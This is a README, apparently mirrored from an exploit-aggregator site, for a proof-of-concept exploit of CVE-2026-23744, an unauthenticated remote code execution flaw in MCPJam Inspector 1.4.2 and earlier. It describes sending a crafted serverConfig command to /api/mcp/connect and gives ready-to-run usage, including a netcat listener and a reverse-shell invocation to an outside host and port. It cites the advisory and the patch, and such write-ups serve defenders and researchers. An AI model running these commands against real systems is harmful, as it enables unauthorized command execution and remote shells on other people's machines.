Share
## https://sploitus.com/exploit?id=421968DD-E7AD-55D8-A392-435068CF01AE
# CVE-2026-23744 โ€” MCPJam Inspector Unauthenticated RCE

Unauthenticated remote code execution PoC for CVE-2026-23744. MCPJam Inspector `1.4.2` and earlier expose functionality through `/api/mcp/connect` that can launch an attacker-controlled MCP server command without authentication.

> **For authorized testing and research only. Do not use against systems you do not own or have explicit permission to test.**

---

## What it does

```text
HTTP POST -> /api/mcp/connect -> serverConfig command -> process launch -> command execution
```

1. Builds a crafted MCP `serverConfig` payload.
2. Targets the unauthenticated `/api/mcp/connect` endpoint.
3. Launches a configured command through `bash -c`.
4. Supports safe command validation and reverse shell payloads.
5. Provides dry-run/debug modes for payload inspection before sending traffic.

---

## Setup

```bash
git clone https://github.com/ozcanpng/CVE-2026-23744.git
cd CVE-2026-23744
pip install -r requirements.txt
```

---

## Usage

### Safe command proof

```bash
python3 CVE-2026-23744.py \
  --url http://127.0.0.1:3000 \
  --cmd 'id'
```

### Reverse shell

Start a listener first:

```bash
rlwrap nc -lvnp 4444
```

Then run:

```bash
python3 CVE-2026-23744.py \
  --url http://127.0.0.1:3000 \
  --reverse-shell \
  --lhost 10.10.16.53 \
  --lport 4444
```

Useful options:

```text
--cmd COMMAND       Command to execute (default: id)
--server-id VALUE   serverId value in the crafted MCP config (default: pwn)
--dry-run           Build payload flow without sending the HTTP request
--debug             Print endpoint and JSON payload
--verify-tls        Verify HTTPS certificates
--timeout SECONDS   HTTP timeout in seconds (default: 8)
--yes               Skip reverse-shell confirmation prompt
```

---

## Affected

| Product | Affected Version | Access Required | Impact |
|---------|------------------|-----------------|--------|
| MCPJam Inspector | `<= 1.4.2` | None | Remote command execution as the MCPJam Inspector process user |

The issue is especially exposed when MCPJam Inspector listens on `0.0.0.0`, allowing remote hosts to reach the development service.

---

## Notes

- The PoC sends a JSON payload to `/api/mcp/connect`.
- The command is passed through `serverConfig.command` and `serverConfig.args`.
- Prefer `--cmd` for safe validation before attempting a reverse shell.
- Use `--dry-run --debug` to inspect the generated request without touching a target.
- Version `1.4.3` contains the upstream patch according to NVD.

---

## References

- [NVD โ€” CVE-2026-23744](https://nvd.nist.gov/vuln/detail/CVE-2026-23744)
- [GitHub Security Advisory โ€” GHSA-232v-j27c-5pp6](https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6)
- [Patch commit](https://github.com/MCPJam/inspector/commit/e6b9cf9d9e6c9cbec31493b1bdca3a1255fe3e7a)
- [MCPJam Inspector](https://github.com/MCPJam/inspector)

---

## Author

ozcanpng โ€” [github.com/ozcanpng](https://github.com/ozcanpng) โ€” [ozcanpng.dev](https://ozcanpng.dev)